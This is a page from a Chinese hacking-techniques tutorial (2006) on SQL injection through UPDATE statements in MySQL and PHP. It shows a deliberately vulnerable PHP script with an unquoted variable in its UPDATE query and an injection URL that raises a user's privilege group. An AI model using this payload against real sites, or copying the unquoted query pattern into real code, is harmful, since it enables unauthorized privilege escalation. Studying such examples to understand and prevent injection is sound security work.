学院首页>安全防御>黑客技法>UPDATE注射(mysql+php)的两个模式

UPDATE注射(mysql+php)的两个模式

作者:安全天使·SuperHei 来源:黑基 添加时间:2006-5-26 13:15:45

三.测试模式:

  1,变量没有带’’或""[MOD1] 


//test1.php Mod1 

$servername = "localhost"; 

$dbusername = "root"; 

$dbpassword = ""; 

$dbname = "test"; 

mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败"); 

$sql = "update userinfo set pass=$p where user=’heige’";//<--$P没有使用单引号 

$result = mysql_db_query($dbname, $sql); 

$userinfo = mysql_fetch_array($result); 

echo "
SQL Query:$sql
"; 

?>


  脚本里只是修改user=’heige’的pass,如果groudid表示用户的权限等级,我们的目的就是通过构造$p 来达

  到修改groupid的目的:

  那么我们提交:http://127.0.0.1/test1.php?p=123456,groudid=1

  在mysql里查询:
mysql> select * from userinfo;

+---------+-------+--------+

| groudid | user  | pass|

+---------+-------+--------+

| 1 | heige | 123456 |

+---------+-------+--------+

1 row in set (0.01 sec)


  
第 2 页,共 2 页 [1] [2]
上一篇:“网络钓鱼”到底如何钓走你的钱
下一篇:黑客横行的时代 URL地址都会说谎
站内搜索